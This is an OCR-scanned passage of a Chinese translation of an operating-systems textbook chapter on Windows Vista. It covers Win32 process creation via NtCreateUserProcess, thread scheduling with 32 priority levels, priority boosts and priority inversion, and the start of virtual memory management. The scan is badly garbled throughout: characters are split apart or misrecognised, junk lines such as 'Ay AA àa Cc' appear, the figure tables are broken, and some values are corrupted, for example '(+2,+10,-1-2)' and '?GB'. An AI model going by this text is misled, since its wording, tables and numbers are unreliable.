Win32 的 API 中 关于 进程 、 线 程 、 纤 程 的 个 数 将 近 100 个 ， 其 中 大 量 
的 是 各 种 形式 的 处 理 IPC 的 函数 。 对 上 面 讨 论 的 总 结 和 另 一 些 比较 重要 
的 内 容 可 以 参见 图 11-26。 


终止 该 线程 


创建 一 个 新 的 信号 量 


Ay AA àa Cc =. SP 3, Pa 
等 符 一 个 单一 的 信号 量 、 互 斥 量 等 


等 待 一 系列 已 有 句柄 的 对 象 


释放 互 斥 量 使 其 他 线程 可 以 获得 它 





图 11-26 一 些 管理 进程 、 线 程 以 及 纤 程 的 一 些 Win32 调 用 


可 以 注意 到 不 是 所 有 的 这 些 都 是 系统 调用 。 其 中 有 一 些 是 包装 器 ， 


有 一 些 包含 了 重要 的 库 代码 ， 这 些 库 代 码 将 Win32 的 接口 映射 到 本 地 NT 
接口 。 另 外 一 些 ， 例 如 纤 程 的 API， 全 部 都 是 用 户 态 下 的 函数 ， 因 为 就 
像 我 们 之 前 提 到 的 ，Windows Vista 的 内 核 态 中 根本 没有 纤 程 的 概念 ， 纤 
程 完 全 都 是 由 用 户 态 下 的 库 来 实现 的 。 





11.4.3 ”进程 和 线程 的 实现 


本 节 将 用 更 多 细节 来 讲述 Windows 如 何 创 建 一 个 进程 。 因 为 Win32 
是 最 具 文 档 化 的 接口 ， 因 此 我 们 将 从 这 里 开始 讲述 。 我 们 迅速 进入 内 核 
来 理解 创建 一 个 新 进程 的 本 地 API 调 用 是 如 何 实现 的 。 这 里 有 很 多 细节 
我 们 都 将 略 过 ， 比 如 在 创建 一 个 路 径 的 时 候 ，WOW16 和 WOW64 有 怎 
样 专用 的 代码 ， 以 及 系统 如 何 提供 特定 应 用 的 修补 来 修正 应 用 程序 中 的 
小 的 不 兼容 性 和 延迟 错误 。 我 们 主要 集中 在 创建 进程 时 执行 的 主 代码 路 
径 ， 以 及 看 一 看 我 们 已 经 介绍 的 知识 之 间 还 欠缺 的 一 些 细节 。 


当 用 一 个 进程 调用 Win32 CreateProcess 系 统 调 用 的 时 候 ， 则 创建 一 
个 新 的 进程 。 这 种 调用 使 用 kernel32.dll 中 的 一 个 (用 户 态 ) 进程 来 分 几 
步 创建 新 进程 ， 其 中 会 使 用 多 次 系统 调用 和 执行 其 他 的 一 些 操作 。 


1) 把 可 执行 的 文件 名 从 一 个 Win32 路 径 名 转化 为 一 个 NT 路 径 名 。 如 
果 这 个 可 执行 文件 仅 有 一 个 名 字 ， 而 没有 一 个 目录 名 ， 那 么 就 在 默认 的 
目录 里 面 碍 找 《〈 包 括 ， 但 不 限于 ， 那 些 在 PATH 环境 变量 中 的 ) 。 


2) 绑 定 这 个 创建 过 程 的 参数 ， 并 且 把 它们 和 可 执行 程序 的 完全 路 径 
名 传递 给 本 地 API NtCreateUserProcess。 (这 个 API 被 增加 到 Window 
Vista 使 得 创建 进程 的 细节 可 以 在 内 核 态 里 处 理 ， 从 而 让 进程 可 以 在 可 信 
的 边界 内 使 用 。 之 前 介绍 的 那些 API 仍 然 是 存在 的 ， 只 是 不 再 被 win32 


的 CreateProcess 调 用 使 用 。 ) 


3) 在 内 核 态 里 运行 ，NtCreateUserProcess 执 行 参 数 ， 然 后 打开 这 个 
进程 的 映像 ， 创 建 一 个 内 存 区 对 象 〈section object) ， 它 能 够 用 来 把 程 
序 映 射 到 新 进程 的 虚拟 地 址 空间 。 


4) 进 程 管理 占 分 配 和 初始 化 进程 对 象 。〈 对 于 内 核 和 执行 屋 ， 这 个 
内 核 数 据 结构 就 表示 一 个 进程 。) 





5) 内 存 管 理 器 通过 分 配 和 创建 页 目录 及 虚拟 地 址 描述 符 来 为 新 进程 
创建 地 址 空间 。 虚 拟 地 址 描述 符 描述 内 核 态 部 分 ， 包 括 特定 进程 的 区 
域 ， 例 如 目 上 映射 的 页 目录 入 口 可 以 为 每 一 个 进程 在 内 核 态 使 用 内 核 虚拟 
地 址 来 访问 它 整 个 页 表 中 的 物理 页 面 。 











6) 一 个 句柄 表 为 新 的 进程 所 创建 。 所 有 来 自 于 调用 者 并 允许 被 继承 
的 句柄 都 极 复 制 到 这 个 句柄 表 中 。 


7) 共 享 的 用 户 页 被 映射 ， 并 且 内 存 管 理 需 初始 化 一 个 工作 集 的 数据 
结构 ， 这 个 数据 结构 是 在 物理 内 存 缺 少 的 时 候 用 来 决定 哪些 页 可 以 从 一 
个 进程 里 面 移 出 。 可 执行 映像 中 由 内 存 区 对 象 表示 的 部 分 会 被 映射 到 新 
进程 的 用 户 态 地 址 空间 。 








8) 执 行 体 创 建 和 初始 化 用 户 态 的 进程 环境 块 PEB)， 这 个 PEB 为 用 户 
态 和 内 核 用 来 维护 进程 范围 的 状态 信息 ， 例 如 用 户 态 的 堆 指 针 和 可 加 载 


库 列表 (DLL)。 





9) 虚 拟 内 存 是 分 配 在 〈ID 表 ) 新 进程 里 面 的 ， 并 且 用 于 传递 参数 ， 
包括 环境 变量 和 命令 行 。 

10) 一 个 进程 ID 从 特殊 的 句柄 表 DK) 分 配 ， 这 个 句柄 表 是 为 了 
有 效 地 定位 进程 和 线程 局 部 唯一 的 ID。 


11) 一 个 线程 对 象 被 分 配 和 初始 化 。 在 分 配 线程 环境 块 CTEB) 的 
同时 ， 也 分 配 一 个 用 户 态 栈 。 包 含 了 线程 的 为 CPU 寄存 器 保持 的 初始 值 
(包括 指令 和 栈 指针 ) 的 CONTEXT 记 录 也 被 初始 化 了 。 


12) 进 程 对 象 被 放 入 进程 全 局 列表 中 。 进 程 和 线程 对 象 的 句柄 被 分 
配 到 调用 者 的 句柄 表 中 。ID 表 会 为 初始 线程 分 配 一 个 ID。 


13)NtCreateUserProcess 同 用 户 态 返回 新 建 的 进程 ， 其 中 包括 处 于 就 
绪 并 被 挂 起 的 单一 线程 。 





14) 如 果 NT API 失 败 ，Win32 代 码 会 查看 进程 是 否 属于 另 一 子 系 
统 ， 如 WOW64。 或 者 程序 可 能 设置 为 在 调试 状态 下 运行 。 以 上 特殊 情 
况 由 用 户 态 的 CreateProcess 代 人 码 人 处理 。 





15) 如 果 NtCreateUserProcess 成 功 ， 还 有 一 些 操作 要 完成 。Win32 进 
程 必须 向 Win32 子 系统 进程 csrss.exe 注 册 。Kernel32.dl 问 csrss.exe 发 送信 
新 的 进程 及 其 句柄 和 线程 句柄 ， 从 而 进程 可 以 自我 复制 了 。 进 程 


息 
JOY 





和 线程 加 入 子 系统 列表 中 ， 从 而 它们 拥有 了 所 有 Win32 的 进程 和 线程 的 
完整 列表 。 子 系统 此 时 就 显示 一 个 的 带 沙 漏 光 标 表 明 系 统 正 运行 ， 但 光 
标 还 能 使 用 。 当 进程 首次 调用 GUI 函数 ， 通 常 是 创建 新 窗口 ， 光 标 将 消 
失 《 如 果 没 有 调用 到 来 ，2 秒 后 就 会 超时 ) 。 








16) 如 果 进 程 受 限 ， 如 低 权 限 的 Internet Explorer， 令 有 牌 会 被 改变 ， 限 
制 新 进程 访问 对 象 。 





17) 如 果 应 用 程序 被 设置 成 需要 与 当前 Windows 版 本 加 垫 层 (shim) 
地 兼容 运行 ， 则 特定 的 垫 层 将 运行 ( 垫 层 通常 封装 库 调 用 以 稍微 修改 它 
们 的 行为 ， 例 如 返回 一 个 假 的 版 本 号 或 者 延迟 内 存 的 释放 ) 。 











18) 最 后 ， 调 用 NtResumeThread 挂 起 线程 ， 并 把 这 个 结构 返回 给 包 
含 所 创建 的 进程 和 线程 的 ID、 句 柄 的 调用 者 。 


调度 


Windows 内 核 没 有 任何 中 央 调 度 线程 。 所 以 ， 当 一 个 线程 不 能 够 再 
执行 时 ， 线 程 将 进入 内 核 态 ， 调 度 线程 再 决定 转 问 的 下 一 个 线程 。 在 下 
面 这 些 情况 下 ， 当 前 正在 执行 的 线程 会 执行 调度 程序 代码 : 


1. 当 前 执行 的 线程 发 生 了 信号 量 、 互 斥 、 事 件 、1/O 等 类 型 的 阻塞 。 


2. 线 程 问 一 个 对 象 用 信号 《如 发 一 个 信号 或 者 是 唤醒 一 个 事件 ) 
时 。 


3. 配 额 过 期 。 


第 一 种 情况 ， 线 程 已 经 在 内 核 态 运行 并 开始 对 调度 器 或 输入 输出 对 
象 执 行 操作 了 。 它 将 不 能 继续 执行 ， 所 以 线程 会 请 求 调度 程序 代码 寻找 
装载 下 一 个 线程 的 CONTEXT 记 录 去 恢复 其 执行 。 


第 二 种 情况 ， 线 程 也 是 在 内 核 中 运行 。 但 是 ， 在 疝 一 些 对 象 发 出 信 
号 后 ， 它 肯定 还 能 够 继续 执行 ， 因 为 发 信号 对 象 从 来 没有 受到 阻塞 。 然 
而 ， 线 程 必须 请 求 调度 程序 ， 来 观测 它 的 执行 结果 是 否 释 放 了 一 个 具有 
更 高 调度 优先 级 的 正 准 备 运行 的 线程 。 如 果 是 这 样 ， 因 为 Windows 完 全 
是 可 抢占 式 的， 所 以 惑 会 发 生 一 个 线程 切换 《〈“ 例 如， 线程 切换 可 以 发 生 
在 任何 时 候 ， 不 仅仅 是 在 当前 线程 结束 时 ) 。 但 是 ， 在 多 处 理 器 的 情况 
下 ， 处 于 就 绪 状 态 的 线程 会 在 妨 一 个 CPU 上 被 调度 ,那么 ， 即 使 原来 线程 
拥有 较 低 的 调度 优先 级 ， 也 能 在 当前 的 CPU 上 继续 执行 。 











第 三 种 情况 ， 内 核 态 发 生 中 断 ， 这 时 线程 执行 调度 程序 代码 找到 下 
一 个 运行 的 线程 。 由 于 取决 于 其 他 等 待 的 线程 ， 可 能 会 选择 同样 的 线 
程 ， 这 样 线程 就 会 获得 新 的 配额 ， 可 以 继续 执行 。 人 否则 发 生 线 程 切换 。 


在 另外 两 种 情况 下 ， 调 度 程 序 也 会 被 调度 : 
1) 一 个 输入 输出 操作 完成 时 。 


2) 等 待 时 间 结 束 时 。 


在 第 一 种 情况 下 ， 线 程 可 能 处 于 等 竺 输入 输出 时 被 杰 放 然后 执行 。 
如 果 不 保证 最 小 执行 时 间 ， 必 须 检 查 是 否 可 以 事先 对 运行 的 线程 进行 抢 
占 。 调 度 程 序 不 会 在 中 断 处 理 程序 中 运行 《因为 那 使 中 断 关 闭 保 持 太 
A) 。 相 反 ， 中 断 处 理发 生 后 ，DPC 会 排队 等 待 一 会 儿 。 第 二 种 情况 
下 ， 线 程 已 经 对 一 个 信号 量 进行 了 down 操 作 或 者 因 一 些 其 他 对 象 而 被 
咀 瞪 ,但 是 定时 器 已 经 过 期 。 对 于 中 断 处 理 程序 来 说 ， 有 必要 让 DPC 青 
一 次 排队 等 待 ， 以 防止 它 在 定时 霹 中 断 处 理 程序 时 运行 。 














如 果 一 个 线程 在 这 个 时 刻 已 到 就 绪 ， 则 调度 程序 将 会 被 唤醒 并 且 如 
果 新 的 可 运行 线程 有 较 高 的 优先 级 ， 那 么 和 情形 1 的 情况 类 似 ， 当 前 的 
线程 会 被 抢占 。 





现在 让 我 们 来 看 看 具体 的 调度 算法 。Win32 API 提 供 两 个 API 来 影响 
线程 调度 。 首 先 ， 有 一 个 叫 SetPriorityClass 的 用 来 设 定 被 调用 进程 中 所 
有 线程 的 优先 级 。 其 等 级 可 以 是 : 实时 、 高 、 高 于 标准 、 标 准 、 低 于 标 
准 和 空 几 的 。 优 先 级 决定 进程 的 先后 顺序 。 在 Vista 系 统 中 ， 进 程 优先 
级 等 级 也 可 以 被 一 个 进程 用 来 临时 地 把 它 自 己 标记 为 后 台 运 行 
(background) 状态 ， 即 它 不 应 该 被 任何 其 他 的 活动 进程 所 干扰 。) 注 
意 优 先 级 是 对 进程 而 言 的， 但 是 实际 上 会 在 每 个 线程 被 创建 的 时 候 通过 
设置 每 个 线程 开始 运行 的 基本 优先 级 可 以 影响 进程 中 每 条 线程 的 实际 优 
先 级 。 








第 二 个 就 是 SetThreadPriority。 它 根据 进程 的 优先 级 类 来 设 定 进程 中 


每 个 线程 的 相对 优先 级 (可 能 地 ， 但 是 不 必然 地 ， 调 用 线程 》。 可 划分 
如 下 等 级 : 紧要 的 、 最 高 的 、 高 于 标准 的 、 标 准 的 、 低 于 标准 的 、 最 低 
的 和 休眠 的 。 时 间 紧 急 的 线程 得 到 最 高 的 非 即 时 的 调度 优先 ， 而 空 朵 的 
线程 不 管 其 优先 级 类 别 都 得 到 最 低 的 优先 级 。 其 他 优先 级 的 值 依据 优先 
级 的 等 级 来 定 ， 依 次 为 〈+2,+10,-1-2) 。 进 程 优先 级 等 级 和 相对 线程 
优先 级 的 使 用 使 得 能 够 更 容易 地 确定 应 用 程序 的 优先 级 。 





调度 程序 按照 下 列 方式 进行 调度 。 系 统 有 32 个 优先 级 ， 从 0 到 31。 
依照 图 11-27 的 表格 ， 进 程 优先 级 和 相对 线程 优先 级 的 组 合 形成 32 个 绝 
对 线程 优先 级 。 在 表格 的 数字 决定 了 线程 的 基本 优先 级 (base 
priority) 。 除 此 之 外 ， 每 条 线程 都 有 当前 优先 级 (current priority) ， 这 
个 当前 的 优先 级 可 能 会 高 于 《但 是 不 低 于 ) 前 面 提 到 的 基本 优先 级 ， 关 
于 这 一 点 我 们 稍 后 将 会 讨论 。 











| | Win 2R RRRA 
实时 | 高 | 高 于 标准 ”标准 ” 低 于 标准 | 空闲 


| 时 间 紧 急 31 15 15 15 | 15 | 45 
Win32 线 | 最 高 26 15 | 12 10 6 
5 


程 优先 级 | eae 多 | .和 | 9 
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图 11-27 Win32 优 先 级 到 Windows 优 先 级 的 映射 


为 了 使 用 这 些 优先 级 进行 调度 ， 系 统 维护 一 个 包含 32 个 线程 列表 的 
队列 ， 分 别 对 应 图 11-27 中 的 0 一 31 的 不 同等 级 。 每 个 列表 包含 了 就 绪 线 
程 对 应 的 优先 级 。 基 本 的 调度 算法 是 从 优先 级 队列 中 从 31 到 0 的 从 高 优 
先 级 到 低 优先 级 的 顺序 查找 。 一 旦 一 个 非 空 的 列表 被 找到 ， 等 待 队 首 的 
线程 就 运行 一 个 时 间 片 。 如 有 果 时 间 配 额 已 用 完 , 这 个 线程 排 到 其 优先 级 
的 队 尾 ， 而 排 在 前 面 的 线程 束 接 下 来 运行 。 换 句 话说 ， 当 在 最 高 的 优先 
级 有 多 条 线程 处 于 就 绪 状 态 ， 它 们 束 按 时 间 片 轮转 法 来 调度 。 如 果 没 有 
就 绪 的 线程 ， 那 么 处 理 需 空 林 ， 并 设置 成 低 功 耗 状 态 来 等 竺 中 断 的 发 
AR 

















值得 注意 的 是 ， 调 度 取 决 于 线程 而 不 是 取决 于 线程 所 属 的 进程 。 因 
此 调度 程序 并 不 是 首先 查看 进程 然后 再 是 进程 中 的 线程 。 它 直接 找到 线 
程 。 调 度 程 序 并 不 考虑 哪个 线程 属于 哪个 进程 ， 除 非 进行 线程 切换 时 需 
要 做 地 址 空间 的 转换 。 











为 了 改进 在 具有 大 量 处 理 器 的 多 处 理 器 情况 下 的 调度 算法 的 可 伸缩 
性 ， 调 度 定理 器 尽力 不 给 全 局 的 优先 级 表 的 数组 加 上 一 个 全 局 的 锁 来 实 
现 同步 访问 控制 。 相 反 地 ， 对 于 一 个 准备 到 CPU 的 线程 来 说 ， 硝 是 处 理 
絮 已 束 位 ， 则 可 以 让 它 直 接 进 行 ， 而 不 必 进 行 加 锁 操 作 。 





对 于 每 一 个 进程 ， 调 度 管理 器 都 维护 了 一 个 理想 处 理 器 〈ideal 
processor) 记录 ， 它 会 在 尽 可 能 的 时 候 让 线程 在 这 个 理想 处 理 器 上 运 
行 。 这 改善 了 系统 的 性 能 ， 因 为 线程 所 用 到 的 数据 驻 留 在 理想 处 理 器 的 





内 存 中 。 调 度 管理 器 可 以 感知 多 处 理 器 的 环境 ， 并 且 每 一 个 处 理 器 有 自 
己 的 内 存 ， 可 以 运行 需要 任意 大 小 内 存 空间 的 程序 一 一 但 是 如 果 内 存 不 
在 本 地 ， 则 会 花费 较 大 的 时 间 开 销 。 这 些 系统 被 认为 是 NUMA 〈 非 统一 
内 存 地 址 ) 设备 。 调 度 管 理 器 努力 优化 线程 在 这 类 计算 机 上 的 分 配 。 当 
线程 出 现 缺 页 错误 时 ， 内 存 管理 器 努力 把 属于 理想 处 理 器 的 NUMA 节 点 
的 物理 页 面 分 配给 线程 。 














队 首 的 队列 在 图 11-28 中 表示 。 这 个 图 表明 实际 上 有 四 类 优先 等 
级 : 实时 级 、 用 户 级 、 零 页 和 空闲 级 , 即 当 它 为 -1 时 有 效 。 这 些 值 得 我 们 
深入 讨论 。 优 先 级 16 一 31 属 于 实时 级 的 一 类 ， 用 来 为 构建 满足 实时 性 约 
束 的 系统 。 处 于 实时 级 的 线程 优先 于 任何 动态 分 配 级 别 的 线程 ， 但 是 不 
先 于 DPC 和 ISR。 如 果 一 个 实时 级 的 应 用 程序 想 要 在 系统 上 运行 ， 它 就 
要 求 设备 驱动 不 能 运行 DPC 和 ISR 更 多 的 额外 时 间 ， 因 为 这 样 可 能 导致 

这 些 实时 线程 错过 它们 的 截止 时 间 。 
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F 一 个 要 运行 的 线程 


系统 
优先 级 ”| 24 


用 户 
优先 级 N 8 


ee 1 
零 页 线程 0 


空闲 线程 
图 11-28 Windows Vista 为 线程 支持 32 个 优先 级 
用 户 态 下 不 能 运行 实时 级 的 线程 。 如 果 一 个 用 户 级 线程 在 一 个 高 优 
先 级 运行 ， 比 如 说 ， 键 盘 或 者 鼠标 线程 进入 了 一 个 死 循环 ， 键 般 或 者 刀 


标 永远 得 不 到 运行 从 而 系统 被 有 效 地 挂 起 。 把 优先 级 设置 为 实时 级 的 权 
限 ， 需 要 局 用 进程 令 牌 中 相应 的 特权 。 通 第 用 户 没 有 这 个 特权 。 








应 用 程序 的 线程 通常 在 优先 级 1 一 15 上 运行 。 通 过 设 定 进 程 和 线程 
的 优先 级 ， 一 个 应 用 程序 可 以 决定 哪些 线程 得 到 偏爱 (获得 更 高 优先 
R) 。ZeroPage 系 统 线程 运行 在 优先 级 0 并 且 把 所 有 要 释放 的 页 转化 为 





全 部 包含 0 的 页 。 每 一 个 实时 的 处 理 嚣 都 有 一 个 独立 的 ZeroPage 线 程 。 


每 个 线程 都 有 一 个 基于 进程 优先 级 的 基本 优先 级 和 一 个 线程 目 己 的 
相对 优先 级 。 用 于 决定 一 个 线程 在 32 个 列表 中 的 哪 一 个 列表 进行 排队 的 
优先 级 取决 于 当前 优先 级 ， 通 常 是 得 到 和 当前 线程 的 基本 优先 级 一 样 的 
优先 级 ， 但 并 不 总 是 这 样 。 在 特定 的 情况 下 ， 非 实时 线程 的 当前 优先 级 
被 内 核 一 下 子 提 到 尽 可 能 高 的 优先 级 〈 但 是 不 会 超过 优先 级 15) 。 因 为 
图 11-28 的 排列 以 当前 的 优先 级 为 基础 ， 所 以 改变 优先 级 可 以 影响 调 
度 。 对 于 实时 优先 级 的 线程 ， 没 有 任何 的 调整 。 


现在 让 我 们 看 看 一 个 线程 在 什么 样 的 时 机 会 得 到 提升 。 首 先 ， 当 输 
入 输出 操作 完成 并 且 唤 醒 一 个 等 竺 线程 的 时 候 ， 优 先 级 一 下 子 被 提高 ， 
给 它 一 个 快速 运行 的 机 会 ， 这 样 可 以 使 更 多 的 VO 可 以 得 到 处 理 。 这 里 
保证 VO 设备 处 于 忙碌 的 运行 状态 。 提 升 的 幅度 依赖 于 输入 输出 设备 ， 
典型 地 磁盘 片 对 应 于 1 级 ， 蝇 行 总 线 对 应 于 2 级 ，6 级 对 应 于 键 禹 ，8 级 对 
应 于 声卡 。 














其 次 ， 如 末 一 个 线程 在 等 竺 信号 量 ， 互 斥 量 同步 或 其 他 的 事件 ， 当 
这 些 条 件 满足 线程 被 唤醒 的 时 候 ， 如 果 它 是 前 台 的 进程 (该 进程 控制 键 
盘 输入 发 送 到 的 窗口 ) 的 话 ， 这 个 线程 就 会 得 到 两 个 优先 级 的 提升 ， 其 
他 情况 则 只 提升 一 个 优先 级 。 这 倾 回 于 把 交互 式 的 进程 优先 级 提升 到 8 
级 以 上 上。 最后， 如果 一 个 窗口 输入 就 绪 使 得 图 形 用 户 接口 线程 被 唤醒 ， 
它 的 优先 级 同样 会 得 到 大 幅 提 升 。 


提升 不 是 永远 的 。 优 先 级 的 提升 是 立刻 发 生 作用 的 ， 并 且 会 引起 处 
理 融 的 再 次 调度 。 但 是 如 条 一 个 线程 用 完 它 的 时 间 分 配 量 ， 它 就 会 降低 
一 个 优先 级 而 且 排 在 新 优先 级 队列 的 队 尾 。 如 果 它 两 次 用 完 一 个 完整 的 
时 间 配 额 , 它 就 会 再 降 一 个 优先 级 ， 如 此 下 去 直到 降 到 它 的 基本 优先 
级 ， 在 基本 优先 级 得 到 保持 不 会 再 降 ， 下 到 它 的 优先 级 再 次 得 到 提升 。 








还 有 一 种 情况 就 是 系统 变动 (Cidde) 优先 级 。 假 设 有 二 个 线程 正 
在 一 个 生产 者 -消费 者 类 型 问题 上 一 起 协同 工作 。 生 产 者 的 工作 需要 更 
多 的 资源 ， 因 此 ， 它 得 到 高 的 优先 级 ， 例 如 说 12， 而 消费 者 得 到 的 优先 
级 为 4。 在 特定 的 时 刻 ， 生 产 者 已 经 把 共享 的 缓冲 区 填 满 ,信号 量 发 生 阻 
塞 ， 如 图 11-29a 所 示 。 














在 信号 量 上 执行 down BHF 


操作 ， 然 后 阻塞 在 信号 量 上 等 待 





”在 信号 量 上 执行 
就 绪 oF up 操作 ， 但 未 被 调度 


a) 


图 11-29 优先 级 转 置 的 示例 


如 图 11-29b 所 示 ， 在 消费 者 得 到 调度 再 次 运行 之 前 ， 一 个 无 关 的 线 





程 在 优先 级 8 已 就 绪 得 到 调度 运行 。 只 要 这 个 线程 想 要 运行 , 它 将 会 一 直 
运行 ， 因 为 这 个 线程 的 优先 级 高 于 消费 者 的 优先 级 ， 而 比 它 优先 级 高 的 
生产 者 由 于 阻 窗 也 不 能 够 运行 。 在 这 种 情况 下 ， 直 到 优先 级 为 8 的 线程 


\ 一 /一 


运行 完毕 ， 生 产 者 才 有 机 会 再 次 运行 。 


Windows 通 过 一 个 称 为 大 hack 来 解决 此 类 问题 的 。 系 统 记录 一 个 已 
就 绪 的 线程 自从 上 次 得 到 运行 后 距离 当前 的 时 间 有 多 和 久 。 如 果 它 超过 一 
个 特定 的 闵 值 ， 它 就 被 提升 到 15 级 的 优先 级 并 得 到 两 个 时 间 配 额 的 运 
转 。 这 就 可 能 解决 生产 者 阻塞 的 情况 。 在 两 个 时 间 配 额 用 完 之 后 ， 它 的 
优先 级 一 下 子 又 回 到 原来 的 优先 级 而 不 是 逐 级 别 地 缓慢 下 降 到 原来 的 优 
先 级 。 或 许 较 好 的 解决 方法 是 把 那些 用 完 时 间 配 额 的 线程 的 优先 级 不 断 
地 降低 。 毕 竞 ， 问 题 不 是 由 饥饿 的 线程 所 引起 的 ， 而 是 由 贪 梦 线程 造成 
的 。 这 一 问题 广为人知 地 称 作 优先 级 倒转 (priority inversion) 。 

















在 优先 为 16 条 线程 获得 互 斥 量 却 长 时 间 得 不 到 调度 的 时 候 会 发 生 一 
个 类 似 的 问题 ， 致 使 更 重要 的 系统 线程 由 于 等 待 互 斥 量 而 不 能 运行 发 生 
饥饿 。 这 一 问题 在 操作 系统 里 通过 在 那些 只 需要 短 时 间 拥 有 互 斥 量 的 线 
程 在 很 已 时 茶 用 调度 来 解决 。《〈 在 一 个 多 处 理 器 上 ， 一 个 Spin 锁 应 被 使 
用 。) 











在 离开 调度 的 主题 之 前 ， 关 于 时 间 配 额 值得 再 讨论 一 下 。 在 
Windows 客 户 端 系统 上 ， 默 认 值 是 20 训 秒 。 在 Windows 服 务 器 系统 上 ， 
它 是 180 宣 秒 。 短 的 时 间 配 额 在 交互 性 上 会 更 好 些 ， 然 而 长 的 时 间 配 额 


能 减少 切换 提高 效率 。 如 果 需 要 ， 时 间 配 额 可 以 手动 地 设置 成 默认 值 的 
2 倍 、4 倍 或 6 倍 。 

















最 后 对 调度 算法 来 说 ， 当 新 窗口 变 成 前 人 台 窗口 的 时 候 ， 筷 的 全 部 在 
窗口 中 注册 的 线程 都 会 得 到 一 个 较 长 的 时 间 配 额 。 这 一 个 变化 给 它们 较 
多 的 处 理 需 时 间 ， 从 而 为 这 些 窗口 刚刚 转移 到 前 合 的 应 用 程序 带 来 了 更 
好 的 用 户 体验 。 


11.5 内存 管理 


Windows Vista 有 一 个 极端 复杂 的 虚拟 内 存 系统 。 这 一 系统 包括 了 大 
量 Win32 函 数 ， 这 些 函 数 通 过 内 存 管理 融 (NTOS 执 行 层 最 大 的 组 件 ) 
来 实现 。 在 下 面 章节 中 ， 我 们 将 依次 了 解 它 的 基本 概念 、Win32 的 APIT 
调用 以 及 它 的 实现 。 








11.5.1 基本 概念 





在 Windows Vista 系 统 中 ， 每 个 用 户 进 程 都 有 它 自 己 的 虚拟 地 址 空 
间 。 对 于 x86 机 器 ， 虚 拟 地 址 是 32 位 的 ， 因 此 ， 每 个 进程 拥有 4GB 大 小 
的 虚拟 地 址 空间 。 其 中 用 户 态 进程 的 虚拟 地 址 大 小 为 2GB 在 服务 器 系 
统 中 ， 用 户 态 进程 的 虚拟 地 址 大 小 可 以 配置 成 ?GB) 。 另 外 的 2GB 或 
1GB) 空间 为 内 核 进程 所 用 。 对 于 运行 在 64 位 上 的 x64 机 器 而 言 ， 地 址 
可 以 是 32 位 的 也 可 以 是 64 位 的 。32 位 地 址 是 为 了 应 用 那些 “需要 通过 
WOW64 来 运行 在 64 位 系统 上 的 32 位 进程 而 保留 的 。 由 于 内 核 拥 有 大 量 
可 用 的 地 址 空间 ， 如 果 需 要 的 话 ，32 位 进程 可 以 使 用 全 部 4GB 大 小 的 地 

空间 。 对 于 x86 和 x64 机 器 ， 虚 拟 地 址 空间 需要 分 页 ， 并 且 页 的 大 小 一 
般 都 是 固定 在 4KB 一 一 虽然 在 有 些 情况 下 每 页 的 大 小 也 可 被 分 为 
4MB 〈 通 过 只 使 用 页 目录 而 忽略 掉 页 表 ) 。 








图 11-30 表 示 了 三 个 x86 进 程 的 虚拟 地 址 空间 。 每 个 进程 的 底部 和 项 
端 64KB 的 虚拟 地 址 空间 通常 保留 不 用 。 这 种 做 法 是 为 了 辅助 发 现 程序 
错误 而 设置 的 。 无 效 的 指针 通常 标志 为 0 或 者 -1， 使 用 这 样 的 指针 会 导 
致 立即 陷入 中 断 ， 而 不 会 读 取 垃 圾 信息 、 甚 至 写 入 错误 的 内 存 地 址 。 
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下 、 底 部 和 顶部 的 64KB 空 间 是 无 效 的 


图 11-30 x86 三 个 用 户 进 程 的 虚拟 地 址 空间 。 和 白色 的 区 域 为 每 个 进程 
私有 的 。 阴 影 的 区 域 为 所 有 的 进程 共享 


从 64KB 开 始 为 用 户 私 有 的 代码 和 数据 。 这 些 空间 可 以 扩充 到 几乎 2 
个 GB。 而 最 项 端的 2GB 包 含 了 操作 系统 部 分 ， 包 括 人 代码、 数据 、 换 页 
内 存 池 和 非 换 页 内 存 池 。 除 了 每 一 进程 的 虚拟 内 存 数据 ( 像 页 表 和 工作 
集 的 列表 ) ， 上 面 的 2GB 全 部 作为 内 核 的 虚拟 内 存 、 并 在 所 有 的 用 户 进 





程 之 中 共享 。 内 核 虚拟 内 存 仪 在 内 核 态 才 可 以 访问 。 共 至 进程 在 内 核 部 
分 的 虚拟 内 存 的 原因 是 : 当 一 个 线程 进行 系统 调用 的 时 候 ， 它 陷入 内 核 
态 之 后 不 需要 改变 内 存 映射 。 所 有 要 做 的 只 是 切换 到 线程 的 内 核 栈 。 由 
于 进程 在 用 户 态 下 的 页 面 仍然 是 可 访问 的 ， 内 核 态 下 的 代码 在 读 取 参 数 
和 访问 缓冲 时 ， 萄 不 用 在 地 址 空间 之 间 来 回 切 换 、 或 者 临时 将 页 面 进行 
两 次 映 财 。 这 里 的 权衡 是 通过 用 较 小 的 进程 私有 地 址 空间 ， 来 换取 更 快 
的 系统 调用 。 











当 运 行 在 内 核 态 的 时 候 ，Windows 人 允许 线程 访问 其 余 的 地 址 空间 。 
这 样 该 线程 就 可 以 访问 所 有 用 户 态 的 地 址 空间 ， 以 及 对 该 进程 来 说 通常 
不 可 访问 的 内 核 地 址 空间 中 的 区 域 ， 例 如 页 表 的 目 上 映射 区 域 。 在 线程 切 
换 到 用 户 态 之 前 ， 必 须 切 换 到 它 最 初 的 地 址 空间 。 


1. 虚 拟 地 址 分 配 


虚拟 地 址 的 每 页 处 于 三 种 状态 之 一 : 无 效 、 保 留 或 提交 。 无 效 页 面 
Cinvalid page) 是 指 一 个 页 面 没有 被 映 射 到 一 个 内 存 区 对 象 Csection 
object) ， 对 它 的 访问 会 引发 一 个 相应 的 页 面 失 效 。 一 旦 代码 或 数据 被 
映射 到 虚拟 页 面 ， 就 说 一 个 页 面 处 于 提交 “committed〉 状态 。 在 提交 
的 页 上 发 生 页 面 失效 会 导致 如 下 情况 : 将 一 个 包含 了 引起 失效 的 虚拟 地 
址 的 页 面 映 射 到 这 样 的 页 面 一 一 由 内 存 区 对 象 所 表示 ， 或 被 保存 于 页 面 
文件 之 中 。 这 种 情况 通常 发生 在 需要 分 配 物 理 页 面 ， 以 及 对 内 存 区 对 象 
所 表示 的 文件 进行 WO 来 从 硬盘 读 取 数据 的 时 候 。 但 是 页 面 失效 的 发 生 

















也 可 能 是 页 表 正 在 更 新 而 造成 的 ， 即 物理 页 面 仍 在 内 存 的 高 速 缓存 中 ， 
这 种 情况 下 不 需要 进行 WO。 这 些 叫 做 软 异 常 (soft fault) ， 稍 后 我 们 会 
更 详细 地 讨论 它们 。 





虚拟 页 面 还 可 以 处 于 保留 的 (reserved)〉 状态 。 保 留 的 虚拟 页 是 无 
效 的 ， 但 是 这 些 页 面 不 能 被 内 存 管理 器 用 于 其 他 目的 而 分 配 。 例 如 ， 当 
